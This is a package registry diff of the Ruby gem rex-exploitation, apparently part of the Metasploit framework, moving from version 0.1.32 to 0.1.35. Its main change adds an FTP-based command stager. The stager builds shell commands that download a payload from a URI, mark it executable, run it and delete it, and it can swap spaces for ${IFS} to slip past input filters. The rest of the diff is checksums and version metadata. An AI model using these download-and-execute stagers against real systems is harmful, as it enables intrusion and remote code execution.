rex-exploitation 0.1.32 → 0.1.35

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: ea51688315db43ddb2a980d72a715dbe8f7eaf59613df153392b2bcb10735eb0
4
- data.tar.gz: d2278d504b70b8db76031c45669a87ae25377c595e318efae605732beaaf79a6
3
+ metadata.gz: f8c5dd5d5f1eb9ec413185374a38cd0e3cc5bfd021d12e31883a41214a9b16e7
4
+ data.tar.gz: 5b207563c2e70275c99b0facc43cc93c21237aa8901d88bc1e931f52f820ebaf
5
5
  SHA512:
6
- metadata.gz: c3dcf1ca77715c531385068d818183d3a130551a9505fb281be4cc26a3d24b9166235acce86474370195eec466b1a416fe83b0286fd787bd393956317733d827
7
- data.tar.gz: f7c73e02aca2da10019466617de38c0ca728c592a0420faaee0972911364be5c00673b694f1ad2510728aa94aa72230ef9cdf8311716c4528dbf6a2ebe3b7172
6
+ metadata.gz: 7307d2354918f95ff10582008e06edd044d2808e6a0fae3cf2f3eca99270ce0132dc51974c7bf4efbb5362eee0c2c562012c9f4858da7da5b4defa1f874f6bde
7
+ data.tar.gz: cec19fc06107b7cd0ed438cc504d36c5df6b4b6c458baffb4b71f6ca1da496f44c29c941ed0b51530dba12240bd7a539c76bee04d01dfe84dde61eeacbbf3a72
checksums.yaml.gz.sig CHANGED
Binary file
@@ -0,0 +1,49 @@
1
+ # -*- coding: binary -*-
2
+
3
+ class Rex::Exploitation::CmdStagerFtpHttp < Rex::Exploitation::CmdStagerBase
4
+
5
+ def http?
6
+ true
7
+ end
8
+
9
+ def user_agent
10
+ /ftp/i
11
+ end
12
+
13
+ def generate(opts = {})
14
+ if opts[:payload_uri].nil?
15
+ raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
16
+ end
17
+
18
+ opts[:temp] ||= '/tmp'
19
+ opts[:file] ||= Rex::Text.rand_text_alpha(8)
20
+ @payload_path = "#{opts[:temp]}/#{opts[:file]}"
21
+
22
+ super
23
+ end
24
+
25
+ def generate_cmds_payload(opts)
26
+ # -o: output file name (argument must be before URL)
27
+ ["ftp -o #{@payload_path} #{opts[:payload_uri]}"]
28
+ end
29
+
30
+ def generate_cmds_decoder(opts)
31
+ cmds = []
32
+
33
+ cmds << "chmod +x #{@payload_path}"
34
+ cmds << @payload_path
35
+ cmds << "rm -f #{@payload_path}" unless opts[:nodelete]
36
+
37
+ cmds
38
+ end
39
+
40
+ def compress_commands(cmds, opts)
41
+ cmds.each { |cmd| cmd.gsub!(/\s+/, '${IFS}') } if opts[:nospace]
42
+ super
43
+ end
44
+
45
+ def cmd_concat_operator
46
+ ';'
47
+ end
48
+
49
+ end
@@ -14,3 +14,4 @@ require 'rex/exploitation/cmdstager/curl'
14
14
  require 'rex/exploitation/cmdstager/fetch'
15
15
  require 'rex/exploitation/cmdstager/lwprequest'
16
16
  require 'rex/exploitation/cmdstager/psh_invokewebrequest'
17
+ require 'rex/exploitation/cmdstager/ftp_http'
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Exploitation
3
- VERSION = "0.1.32"
3
+ VERSION = "0.1.35"
4
4
  end
5
5
  end
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-exploitation
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.32
4
+ version: 0.1.35
5
5
  platform: ruby
6
6
  authors:
7
7
  - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
93
93
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
94
94
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
95
95
  -----END CERTIFICATE-----
96
- date: 2022-07-11 00:00:00.000000000 Z
96
+ date: 2022-07-18 00:00:00.000000000 Z
97
97
  dependencies:
98
98
  - !ruby/object:Gem::Dependency
99
99
  name: rake
@@ -263,6 +263,7 @@ files:
263
263
  - lib/rex/exploitation/cmdstager/debug_write.rb
264
264
  - lib/rex/exploitation/cmdstager/echo.rb
265
265
  - lib/rex/exploitation/cmdstager/fetch.rb
266
+ - lib/rex/exploitation/cmdstager/ftp_http.rb
266
267
  - lib/rex/exploitation/cmdstager/lwprequest.rb
267
268
  - lib/rex/exploitation/cmdstager/printf.rb
268
269
  - lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb
metadata.gz.sig CHANGED
Binary file